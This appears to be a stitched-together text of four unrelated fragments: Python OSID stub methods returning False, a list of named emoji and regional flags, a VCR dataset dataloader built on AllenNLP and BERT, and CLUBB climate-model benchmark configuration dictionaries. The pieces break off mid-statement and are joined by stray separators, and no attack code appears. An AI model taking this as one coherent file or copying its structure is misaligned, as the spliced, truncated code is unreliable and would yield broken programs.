*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_notification(self):
"""Tests if a sequence rule notification service is supported.
return: (boolean) - ``true`` if sequence rule notification is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_bank(self):
"""Tests if a sequence rule bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule bank lookup
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_bank_assignment(self):
"""Tests if a sequence rule bank service is supported.
return: (boolean) - ``true`` if sequence rule bank assignment
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_smart_bank(self):
"""Tests if a sequence rule bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule bank service is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_lookup(self):
"""Tests if looking up sequence rule enablers is supported.
return: (boolean) - ``true`` if sequence rule enabler lookup is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_query(self):
"""Tests if querying sequence rule enablers is supported.
return: (boolean) - ``true`` if sequence rule enabler query is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_search(self):
"""Tests if searching sequence rule enablers is supported.
return: (boolean) - ``true`` if sequence rule enabler search is
supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_admin(self):
"""Tests if a sequence rule enabler administrative service is supported.
return: (boolean) - ``true`` if sequence rule enabler
administration is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_notification(self):
"""Tests if a sequence rule enabler notification service is supported.
return: (boolean) - ``true`` if sequence rule enabler
notification is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_bank(self):
"""Tests if a sequence rule enabler bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule enabler bank
lookup service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_bank_assignment(self):
"""Tests if a sequence rule enabler bank service is supported.
return: (boolean) - ``true`` if sequence rule enabler bank
assignment service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_smart_bank(self):
"""Tests if a sequence rule enabler bank lookup service is supported.
return: (boolean) - ``true`` if a sequence rule enabler bank
service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_rule_lookup(self):
"""Tests if a sequence rule enabler rule lookup service is supported.
return: (boolean) - ``true`` if a sequence rule enabler rule
lookup service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def supports_sequence_rule_enabler_rule_application(self):
"""Tests if a sequence rule enabler rule application service is supported.
return: (boolean) - ``true`` if sequence rule enabler rule
application service is supported, ``false`` otherwise
*compliance: mandatory -- This method must be implemented.*
"""
return False
def get_assessment_part_record_types(self):
"""Gets the supported ``AssessmentPart`` record types.
return: (osid.type.TypeList) - a list containing the supported
``AssessmentPart`` record types
*compliance: mandatory -- This method must be implemented.*
"""
return TypeList([])
assessment_part_record_types = property(fget=get_assessment_part_record_types)
def supports_assessment_part_record_type(self, assessment_part_record_type=None):
"""Tests if the given ``AssessmentPart`` record type is supported.
arg: assessment_part_record_type (osid.type.Type): a ``Type``
indicating an ``AssessmentPart`` record type
return: (boolean) - ``true`` if the given record type is
supported, ``false`` otherwise
raise: NullArgument - ``assessment_part_record_type`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
if assessment_part_record_type is None:
raise NullArgument()
return False
def get_assessment_part_search_record_types(self):
"""Gets the supported ``AssessmentPart`` search record types.
return: (osid.type.TypeList) - a list containing the supported
``AssessmentPart`` search record types
*compliance: mandatory -- This method must be implemented.*
"""
return TypeList([])
assessment_part_search_record_types = property(fget=get_assessment_part_search_record_types)
def supports_assessment_part_search_record_type(self, assessment_part_search_record_type=None):
"""Tests if the given ``AssessmentPart`` search record type is supported.
arg: assessment_part_search_record_type (osid.type.Type): a
``Type`` indicating an ``AssessmentPart`` search record
type
return: (boolean) - ``true`` if the given search record type is
supported, ``false`` otherwise
raise: NullArgument - ``assessment_part_search_record_type`` is
``null``
*compliance: mandatory -- This method must be implemented.*
"""
if assessment_part_search_record_type is None:
raise NullArgument()
return False
def | |
Family - Woman: Light Skin Tone, Man: Light Skin Tone, Boy: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Kalbajar (AZ-KAL)
🏴 Flag for Gadabay (AZ-GAD)
🏴 Flag for Lachin (AZ-LAC)
🏴 Flag for Lankaran (AZ-LA)
🏴 Flag for Ho Chi Minh City (VN-SG)
🏴 Flag for Lerik (AZ-LER)
🏴 Flag for Mingachevir (AZ-MI)
👩🏾👨🏾👧🏾👧🏾 Family - Woman: Medium-Dark Skin Tone, Man: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone
🏴 Flag for Naftalan (AZ-NA)
🏴 Flag for Masally (AZ-MAS)
👨❤️👩 Couple With Heart - Man, Woman
🏴 Flag for Lankaran District (AZ-LAN)
👩🏼👨🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Man: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👩🏽❤️💋👨🏾 Kiss - Woman: Medium Skin Tone, Man: Medium-Dark Skin Tone
👩🏿👧🏿👶🏿 Family - Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Neftchala (AZ-NEF)
🏴 Flag for Nakhchivan AR (AZ-NX)
🏴 Flag for Celje (SI-011)
🏴 Flag for Panevėžio Municipality (LT-32)
👩🏿❤️💋👩🏽 Kiss - Woman: Dark Skin Tone, Woman: Medium Skin Tone
👨🏻❤️👩🏿 Couple With Heart - Man: Light Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Ismailli (AZ-ISM)
Tag Latin Small Letter H
👩🏾❤️👨🏻 Couple With Heart - Woman: Medium-Dark Skin Tone, Man: Light Skin Tone
👩🏻👶🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Nana-Mambéré (CF-NM)
🏴 Flag for Gobustan (AZ-QOB)
👩🏿❤️💋👨🏻 Kiss - Woman: Dark Skin Tone, Man: Light Skin Tone
👩🏿❤️💋👩🏿 Kiss - Woman: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Qubadli (AZ-QBI)
🏴 Flag for Qazakh (AZ-QAZ)
🏴 Flag for Braşov (RO-BV)
👨👩👧👶 Family: Man, Woman, Girl, Baby
🏴 Flag for Quba (AZ-QBA)
🏴 Flag for Qabala (AZ-QAB)
🏴 Flag for Uri (CH-UR)
🏴 Flag for Oghuz (AZ-OGU)
🏴 Flag for Qakh (AZ-QAX)
🏴 Flag for Šmarješke Toplice (SI-206)
👨🏾❤️💋👩🏿 Kiss - Man: Medium-Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Saint Peter (AG-07)
👨🏻👩🏻👧🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Maryland (LR-MY)
🏴 Flag for South Australia (AU-SA)
🏴 Flag for Qusar (AZ-QUS)
🏴 Flag for Sabirabad (AZ-SAB)
👨❤️👩🏽 Couple With Heart - Man, Woman: Medium Skin Tone
👨❤️👩🏼 Couple With Heart - Man, Woman: Medium-Light Skin Tone
🏴 Flag for Saatly (AZ-SAT)
🏴 Flag for Shabran (AZ-SBN)
👨🏼❤️👩🏽 Couple With Heart - Man: Medium-Light Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Shaki District (AZ-SAK)
🏴 Flag for Casanare (CO-CAS)
👨👩👶👶 Family: Man, Woman, Baby, Baby
🏴 Flag for Shirvan (AZ-SR)
🏴 Flag for Shusha (AZ-SUS)
🏴 Flag for Valais (CH-VS)
👩🏽👶🏽 Family - Woman: Medium Skin Tone, Baby: Medium Skin Tone
👩🏻❤️💋👨🏿 Kiss - Woman: Light Skin Tone, Man: Dark Skin Tone
🏴 Flag for Shaki (AZ-SA)
🏴 Flag for Martinique (FR-MQ)
🏴 Flag for Sumqayit (AZ-SM)
🏴 Flag for Siazan (AZ-SIY)
🏴 Flag for Shamakhi (AZ-SMI)
👩🏿❤️💋👨 Kiss - Woman: Dark Skin Tone, Man
🏴 Flag for Samukh (AZ-SMX)
👨🏻👩🏻👧🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Girl: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Tovuz (AZ-TOV)
🏴 Flag for Khachmaz (AZ-XAC)
🏴 Flag for Ujar (AZ-UCA)
🏴 Flag for Tartar (AZ-TAR)
👨🏿❤️💋👨🏻 Kiss - Man: Dark Skin Tone, Man: Light Skin Tone
👩🏼👧🏼👧🏼 Family - Woman: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏽👩🏽👧🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Khizi (AZ-XIZ)
👨🏽❤️👨🏼 Couple With Heart - Man: Medium Skin Tone, Man: Medium-Light Skin Tone
🏴 Flag for Khojali (AZ-XCI)
🏴 Flag for Delta Amacuro (VE-Y)
🏴 Flag for Stepanakert (AZ-XA)
🏴 Flag for Yardymli (AZ-YAR)
🏴 Flag for Yevlakh District (AZ-YEV)
🏴 Flag for Zaqatala (AZ-ZAQ)
👩🏾👶🏾 Family - Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Yevlakh (AZ-YE)
🏴 Flag for Federation of Bosnia and Herzegovina (BA-BIH)
🏴 Flag for Zardab (AZ-ZAR)
🏴 Flag for Salyan (AZ-SAL)
🏴 Flag for Zug (CH-ZG)
👨🏾👩🏾👧🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Girl: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
👨🏿👩🏿👧🏿👶🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Baby: Dark Skin Tone
👩🏿👶🏿 Family - Woman: Dark Skin Tone, Baby: Dark Skin Tone
🏴 Flag for Republika Srpska (BA-SRP)
👨🏽❤️👩 Couple With Heart - Man: Medium Skin Tone, Woman
👨🏻👩🏻👶🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone
🏴 Flag for Andalusia (ES-AN)
👨🏼👩🏼👶🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Saint James (BB-04)
👨🏾❤️👩🏼 Couple With Heart - Man: Medium-Dark Skin Tone, Woman: Medium-Light Skin Tone
🏴 Flag for Saint George (BB-03)
🏴 Flag for Saint Andrew (BB-02)
👨👩👶👦 Family: Man, Woman, Baby, Boy
👨🏽👩🏽👶🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone
🏴 Flag for Saint John (BB-05)
👨🏾👩🏾👶🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone
🏴 Flag for Saint Joseph (BB-06)
🏴 Flag for Western (LK-1)
🏴 Flag for Brest (BY-BR)
🏴 Flag for Shamkir (AZ-SKR)
🏴 Flag for Saint Lucy (BB-07)
👩🏻👶🏻👦🏻 Family - Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
🏴 Flag for Castile-La Mancha (ES-CM)
🏴 Flag for Saint Philip (BB-10)
🏴 Flag for Saint George (VC-04)
👨🏻👩🏻👶🏻👦🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Boy: Light Skin Tone
👩🏻👧🏻👧🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Girl: Light Skin Tone
🏴 Flag for Barisal (BD-A)
🏴 Flag for Zangilan (AZ-ZAN)
🏴 Flag for Kingston (JM-01)
👨🏼👩🏼👶🏼👦🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Boy: Medium-Light Skin Tone
🏴 Flag for Rajshahi Division (BD-E)
🏴 Flag for Rangpur Division (BD-F)
🏴 Flag for Dhaka Division (BD-C)
🏴 Flag for Khulna Division (BD-D)
🏴 Flag for Saint Peter (BB-09)
🏴 Flag for Lenart (SI-058)
👩🏼👶🏼 Family - Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone
🏴 Flag for Cascades (BF-02)
🏴 Flag for Mymensingh Division (BD-H)
🏴 Flag for Wallonia (BE-WAL)
🏴 Flag for Beau-Bassin Rose-Hill (MU-BR)
🏴 Flag for Centre-Est (BF-04)
🏴 Flag for Hong Kong SAR China (CN-91)
🏴 Flag for Boucle du Mouhoun (BF-01)
🏴 Flag for Centre (BF-03)
🏴 Flag for Central Denmark (DK-82)
🏴 Flag for Centre-Sud (BF-07)
👨🏽👩🏽👶🏽👦🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Baby: Medium Skin Tone, Boy: Medium Skin Tone
🏴 Flag for Centre-Ouest (BF-06)
🏴 Flag for Centre-Nord (BF-05)
🏴 Flag for Saint Michael (BB-08)
🏴 Flag for Saint Thomas (BB-11)
👨🏽❤️👩🏿 Couple With Heart - Man: Medium Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Est (BF-08)
🏴 Flag for Brussels (BE-BRU)
🏴 Flag for Sylhet Division (BD-G)
🏴 Flag for Plateau-Central (BF-11)
🏴 Flag for Chittagong Division (BD-B)
🏴 Flag for Sud-Ouest (BF-13)
👨🏾👩🏾👶🏾👦🏾 Family - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone, Baby: Medium-Dark Skin Tone, Boy: Medium-Dark Skin Tone
🏴 Flag for Vidin (BG-05)
🏴 Flag for Varna (BG-03)
👨🏿❤️👩🏽 Couple With Heart - Man: Dark Skin Tone, Woman: Medium Skin Tone
🏴 Flag for Burgas (BG-02)
🏴 Flag for Nord (BF-10)
🏴 Flag for Veliko Tarnovo (BG-04)
👨🏽👩🏽👧🏽👧🏽 Family - Man: Medium Skin Tone, Woman: Medium Skin Tone, Girl: Medium Skin Tone, Girl: Medium Skin Tone
🏴 Flag for Gabrovo (BG-07)
👨🏿👩🏿👶🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Baby: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Dobrich (BG-08)
🏴 Flag for Sahel (BF-12)
🏴 Flag for Tasmania (AU-TAS)
👨🏿❤️👩🏻 Couple With Heart - Man: Dark Skin Tone, Woman: Light Skin Tone
👩🏻👧🏻👦🏻 Family - Woman: Light Skin Tone, Girl: Light Skin Tone, Boy: Light Skin Tone
👨🏻👩🏻👶🏻👧🏻 Family - Man: Light Skin Tone, Woman: Light Skin Tone, Baby: Light Skin Tone, Girl: Light Skin Tone
👨🏼👩🏼👶🏼👧🏼 Family - Man: Medium-Light Skin Tone, Woman: Medium-Light Skin Tone, Baby: Medium-Light Skin Tone, Girl: Medium-Light Skin Tone
👨🏾❤️💋👩🏾 Kiss - Man: Medium-Dark Skin Tone, Woman: Medium-Dark Skin Tone
🏴 Flag for Khojavend (AZ-XVD)
🏴 Flag for Lovech (BG-11)
🏴 Flag for Libertador General Bernardo O’Higgins (CL-LI)
🏴 Flag for Pazardzhik (BG-13)
👨🏿❤️👩🏿 Couple With Heart - Man: Dark Skin Tone, Woman: Dark Skin Tone
🏴 Flag for Pernik (BG-14)
🏴 Flag for Kyustendil (BG-10)
🏴 Flag for Red Sea (EG-BA)
🏴 Flag for Zanzibar Central/South (TZ-11)
👨🏿👩🏿👧🏿👦🏿 Family - Man: Dark Skin Tone, Woman: Dark Skin Tone, Girl: Dark Skin Tone, Boy: Dark Skin Tone
🏴 Flag for Pleven (BG-15)
👨🏿👨🏿👦🏿👦🏿 Family - Man: Dark Skin Tone, Man: Dark Skin Tone, Boy: Dark Skin Tone, Boy: Dark Skin | |
# Modifed from R2C
"""
Dataloaders for VCR
"""
import json
import pickle
import os
from collections import defaultdict
import numpy as np
import numpy
import torch
from allennlp.data.dataset import Batch
from allennlp.data.fields import TextField, ListField, LabelField, SequenceLabelField, ArrayField, MetadataField
from allennlp.data.instance import Instance
from allennlp.data.token_indexers import ELMoTokenCharactersIndexer
from allennlp.data.tokenizers import Token
from allennlp.data.vocabulary import Vocabulary
from allennlp.nn.util import get_text_field_mask
from torch.utils.data import Dataset
from dataloaders.box_utils import load_image, resize_image, to_tensor_and_normalize
from dataloaders.mask_utils import make_mask
from dataloaders.bert_field import BertField
import h5py
from copy import deepcopy
from tqdm import tqdm
from .vcr_data_utils import data_iter, data_iter_test, data_iter_item
from .bert_data_utils import InputExample, InputFeatures, get_one_image_feature_npz_screening_parameters, get_image_feat_reader, faster_RCNN_feat_reader, screen_feature
from .bert_field import IntArrayField
from visualbert.pytorch_pretrained_bert.fine_tuning import _truncate_seq_pair, random_word
from visualbert.pytorch_pretrained_bert.tokenization import BertTokenizer
GENDER_NEUTRAL_NAMES = ['Casey', 'Riley', 'Jessie', 'Jackie', 'Avery', 'Jaime', 'Peyton', 'Kerry', 'Jody', 'Kendall',
'Peyton', 'Skyler', 'Frankie', 'Pat', 'Quinn']
# Here's an example jsonl
# {
# "movie": "3015_CHARLIE_ST_CLOUD",
# "objects": ["person", "person", "person", "car"],
# "interesting_scores": [0],
# "answer_likelihood": "possible",
# "img_fn": "lsmdc_3015_CHARLIE_ST_CLOUD/3015_CHARLIE_ST_CLOUD_00.23.57.935-00.24.00.783@0.jpg",
# "metadata_fn": "lsmdc_3015_CHARLIE_ST_CLOUD/3015_CHARLIE_ST_CLOUD_00.23.57.935-00.24.00.783@0.json",
# "answer_orig": "No she does not",
# "question_orig": "Does 3 feel comfortable?",
# "rationale_orig": "She is standing with her arms crossed and looks disturbed",
# "question": ["Does", [2], "feel", "comfortable", "?"],
# "answer_match_iter": [3, 0, 2, 1],
# "answer_sources": [3287, 0, 10184, 2260],
# "answer_choices": [
# ["Yes", "because", "the", "person", "sitting", "next", "to", "her", "is", "smiling", "."],
# ["No", "she", "does", "not", "."],
# ["Yes", ",", "she", "is", "wearing", "something", "with", "thin", "straps", "."],
# ["Yes", ",", "she", "is", "cold", "."]],
# "answer_label": 1,
# "rationale_choices": [
# ["There", "is", "snow", "on", "the", "ground", ",", "and",
# "she", "is", "wearing", "a", "coat", "and", "hate", "."],
# ["She", "is", "standing", "with", "her", "arms", "crossed", "and", "looks", "disturbed", "."],
# ["She", "is", "sitting", "very", "rigidly", "and", "tensely", "on", "the", "edge", "of", "the",
# "bed", ".", "her", "posture", "is", "not", "relaxed", "and", "her", "face", "looks", "serious", "."],
# [[2], "is", "laying", "in", "bed", "but", "not", "sleeping", ".",
# "she", "looks", "sad", "and", "is", "curled", "into", "a", "ball", "."]],
# "rationale_sources": [1921, 0, 9750, 25743],
# "rationale_match_iter": [3, 0, 2, 1],
# "rationale_label": 1,
# "img_id": "train-0",
# "question_number": 0,
# "annot_id": "train-0",
# "match_fold": "train-0",
# "match_index": 0,
# }
class VCR(Dataset):
def __init__(self,
split,
mode,
region_keywords="any",
scene="none",
single_or_multiple="single",
only_use_relevant_dets=True,
add_image_as_a_box=True,
conditioned_answer_choice=0,
do_lower_case = True,
bert_model_name = "",
max_seq_length = 128,
pretraining = False,
pretraining_include_qa_and_qar = False,
complete_shuffle = False,
use_alignment = False,
add_all_features = False,
answer_labels_path = None,
vcr_annots_dir = None,
vcr_image_dir = None
):
self.split = split
self.mode = mode
self.only_use_relevant_dets = only_use_relevant_dets
self.pretraining_include_qa_and_qar = pretraining_include_qa_and_qar
self.add_all_features = add_all_features
self.use_alignment = use_alignment
self.add_image_as_a_box = add_image_as_a_box
self.conditioned_answer_choice = conditioned_answer_choice
self.vcr_annots_dir = vcr_annots_dir
self.vcr_image_dir = vcr_image_dir
with open(os.path.join(self.vcr_annots_dir, '{}.jsonl'.format(split)), 'r') as f:
temp = [json.loads(s) for s in f]
items_temp = []
if "val" in split and region_keywords != "any" and "orig" not in split:
for item in temp:
if region_keywords in item["region"]:
items_temp.append(item)
else:
items_temp = temp
if scene != "none" and (split == "val" or split == "orig_val"):
self.items = []
for item in items_temp:
if split == "val":
if scene in item["keywords"]:
self.items.append(item)
else:
right_answer = item["answer_choices"][item["answer_label"]]
right_rationale = item["rationale_choices"][item["rationale_label"]]
if scene in right_answer or scene in right_rationale:
self.items.append(item)
else:
self.items = items_temp
if "val" in split and "orig" not in split:
temp = self.items
if split == 'val_addition_single' and single_or_multiple == "multiple":
image_fn_list = [item["img_fn"] for item in temp]
with open(os.path.join(self.vcr_annots_dir, 'val.jsonl'), 'r') as f:
temp_val = [json.loads(s) for s in f]
temp = []
for item in temp_val:
if item["img_fn"] in image_fn_list:
temp.append(item)
self.items = temp
if split not in ('test', 'train', 'orig_val', 'val', 'val_addition_single'):
raise ValueError("Mode must be in test, train, orig_val, val, or val_addition_single. Supplied {}".format(mode))
if mode not in ('answer', 'rationale'):
raise ValueError("split must be answer or rationale")
self.vocab = Vocabulary()
with open('cocoontology.json', 'r') as f:
coco = json.load(f)
self.coco_objects = ['__background__'] + [x['name'] for k, x in sorted(coco.items(), key=lambda x: int(x[0]))]
self.coco_obj_to_ind = {o: i for i, o in enumerate(self.coco_objects)}
self.do_lower_case = do_lower_case
self.bert_model_name = bert_model_name
self.max_seq_length = max_seq_length
self.tokenizer = BertTokenizer.from_pretrained(self.bert_model_name, do_lower_case=self.do_lower_case)
self.pretraining = pretraining
self.masked_lm_prob = 0.15
self.max_predictions_per_seq = 20
self.complete_shuffle = complete_shuffle
self.only_qar = True if self.mode=='rationale' else False
if answer_labels_path is not None:
assert(self.only_qar)
if answer_labels_path == 0:
for index, i in enumerate(self.items):
i["answer_label"] = 0
elif answer_labels_path == 1:
for index, i in enumerate(self.items):
i["answer_label"] = 1
elif answer_labels_path == 2:
for index, i in enumerate(self.items):
i["answer_label"] = 2
elif answer_labels_path == 3:
for index, i in enumerate(self.items):
i["answer_label"] = 3
else:
self.answer_labels = np.load(answer_labels_path)
self.answer_labels = self.answer_labels.argmax(1)
if self.split == "test":
assert(self.answer_labels.shape[0] == len(self))
for index, i in enumerate(self.items):
i["answer_label"] = self.answer_labels[index]
else:
self.answer_labels = None
@property
def is_train(self):
return self.split == 'train'
@classmethod
def splits(cls, **kwargs):
""" Helper method to generate splits of the dataset"""
kwargs_copy = {x: y for x, y in kwargs.items()}
if 'mode' not in kwargs:
kwargs_copy['mode'] = 'answer'
train = cls(split='train', **kwargs_copy)
orig_val = cls(split='orig_val', **kwargs_copy)
val = cls(split='val', **kwargs_copy)
val_addition = cls(split='val_addition_single', **kwargs_copy)
test = cls(split='test', **kwargs_copy)
return train, orig_val, val, val_addition, test
def __len__(self):
if self.complete_shuffle:
if self.pretraining_include_qa_and_qar:
return len(self.items) * 8
else:
return len(self.items) * 4
return len(self.items)
def _get_dets_to_use(self, item, only_use_answer = False, only_use_qar = False): # Need to fix this match
"""
We might want to use fewer detectiosn so lets do so.
:param item:
:param question:
:param answer_choices:
:return:
"""
# Load questions and answers
question = item['question']
answer_choices = item['{}_choices'.format(self.mode)]
if self.mode == "answer":
question = item['question']
answer_choices = item['{}_choices'.format(self.mode)]
elif self.mode == "rationale":
question = item['question'] + item['answer_choices'][item['answer_label']]
answer_choices = item['{}_choices'.format(self.mode)]
if self.pretraining_include_qa_and_qar:
answer_choices = item['answer_choices'] + item['rationale_choices']
if self.add_all_features:
question = item['question']
answer_choices = item['answer_choices'] + item['rationale_choices']
if self.only_use_relevant_dets:
dets2use = np.zeros(len(item['objects']), dtype=bool)
people = np.array([x == 'person' for x in item['objects']], dtype=bool)
for sent in answer_choices + [question]:
for possibly_det_list in sent:
if isinstance(possibly_det_list, list):
for tag in possibly_det_list:
if tag >= 0 and tag < len(item['objects']): # sanity check
dets2use[tag] = True
elif possibly_det_list.lower() in ('everyone', 'everyones'):
dets2use |= people
if not dets2use.any():
dets2use |= people
else:
dets2use = np.ones(len(item['objects']), dtype=bool)
dets2use = np.where(dets2use)[0]
old_det_to_new_ind = np.zeros(len(item['objects']), dtype=np.int32) - 1
old_det_to_new_ind[dets2use] = np.arange(dets2use.shape[0], dtype=np.int32)
# If we add the image as an extra box then the 0th will be the image.
if self.add_image_as_a_box:
old_det_to_new_ind[dets2use] += 1
old_det_to_new_ind = old_det_to_new_ind.tolist()
return dets2use, old_det_to_new_ind
def __getitem__(self, index):
if self.complete_shuffle:
if self.pretraining_include_qa_and_qar:
index = index // 8
which = index % 8
else:
index = index // 4
which = index % 4
else:
which = None
item = deepcopy(self.items[index])
###################################################################
# Load questions and answers
if self.complete_shuffle and which < 4:
only_use_answer = True
else:
only_use_answer = False
if self.complete_shuffle and which >= 4:
only_use_qar = True
else:
only_use_qar = False
dets2use, old_det_to_new_ind = self._get_dets_to_use(item, only_use_answer = only_use_answer, only_use_qar = only_use_qar)
instance_dict = {}
if self.split != 'test':
instance_dict['label'] = LabelField(item['{}_label'.format(self.mode)], skip_indexing=True)
if self.split == "train" or self.split == "test" or self.split == "orig_val":
instance_dict['metadata'] = MetadataField({'annot_id': item['annot_id'], 'ind': index, 'movie': item['movie'],
'img_fn': item['img_fn'],
'question_number': item['question_number']})
else:
instance_dict['metadata'] = MetadataField({'annot_id': item['annot_id'], 'ind': index, 'region': item['region'],
'img_fn': item['img_fn'],
'question_number': item['question_number']})
###################################################################
# Load image now and rescale it. Might have to subtract the mean and whatnot here too.
image = load_image(os.path.join(self.vcr_image_dir, item['img_fn']))
image, window, img_scale, padding = resize_image(image, random_pad=self.is_train)
image = to_tensor_and_normalize(image)
c, h, w = image.shape
###################################################################
# Load boxes.
with open(os.path.join(self.vcr_image_dir, item['metadata_fn']), 'r') as f:
metadata = json.load(f)
# [nobj, 14, 14]
'''if len(metadata['segms']) < dets2use[-1] + 1:
print(index, item['img_fn'], len(metadata['segms']), dets2use)'''
segms = np.stack([make_mask(mask_size=14, box=metadata['boxes'][i], polygons_list=metadata['segms'][i]) for i in dets2use])
# Chop off the final dimension, that's the confidence
boxes = np.array(metadata['boxes'])[dets2use, :-1]
# Possibly rescale them if necessary
boxes *= img_scale
boxes[:, :2] += np.array(padding[:2])[None]
boxes[:, 2:] += np.array(padding[:2])[None]
obj_labels = [self.coco_obj_to_ind[item['objects'][i].replace(" ","")] for i in dets2use.tolist()]
if self.add_image_as_a_box:
boxes = np.row_stack((window, boxes))
segms = np.concatenate((np.ones((1, 14, 14), dtype=np.float32), segms), 0)
obj_labels = [self.coco_obj_to_ind['__background__']] + obj_labels
examples = data_iter_item(item, tokenizer=self.tokenizer,
max_seq_length=self.max_seq_length,
endingonly=False,
include_qar = self.pretraining_include_qa_and_qar,
only_qar = self.only_qar)
self.getitem_bert_part(examples, item, instance_dict, which)
if self.use_alignment: # Alignment between objects and text
######################
examples_alginment_pack = []
for i in range(len(examples)):
if self.pretraining_include_qa_and_qar:
if i < 4:
raw_text_a = item["question"]
raw_text_b | |
None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
CLEX9_OCT14 = {'name': 'clex9_oct14',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 2230, 'height_max_value': 6688,
'blacklisted_vars': ['Ngm'],
'sam_benchmark_file': None,
'clubb_file': {'zm': clubb_output_root + '/clex9_oct14_zm.nc',
'zt': clubb_output_root + '/clex9_oct14_zt.nc',
'sfc': clubb_output_root + '/clex9_oct14_sfc.nc'},
'coamps_benchmark_file': {'sm': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sm.nc",
'sw': COAMPS_BENCHMARK_OUTPUT_ROOT + "/clex9_oct14_coamps_sw.nc"},
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': None,
'clubb_hoc_benchmark_file': None,
'e3sm_file': None,
'cam_file': None,
'sam_file': None,
'wrf_file': None,
'var_groups': [VariableGroupBase, VariableGroupLiquidMP, VariableGroupIceMP]}
DYCOMS2_RF01 = {'name': 'dycoms2_rf01',
'description': "",
'start_time': 181, 'end_time': 240,
'height_min_value': 0, 'height_max_value': 1200,
'blacklisted_vars': [],
'sam_benchmark_file': {'sam_benchmark': SAM_BENCHMARK_OUTPUT_ROOT +
"/JULY_2017/DYCOMS_RF01_96x96x320/DYCOMS_RF01_96x96x320.nc"},
'clubb_file': {'zm': clubb_output_root + '/dycoms2_rf01_zm.nc',
'zt': clubb_output_root + '/dycoms2_rf01_zt.nc',
'sfc': clubb_output_root + '/dycoms2_rf01_sfc.nc'},
'coamps_benchmark_file': None,
'wrf_benchmark_file': None,
'clubb_r408_benchmark_file': {'zm': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zm.nc',
'zt': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_zt.nc',
'sfc': R408_OUTPUT_ROOT + '/Chris_Golaz_best_ever/dycoms2_rf01_sfc.nc'},
'clubb_hoc_benchmark_file': {'zm': HOC_OUTPUT_ROOT + '/dycoms2_rf01_zm.nc',
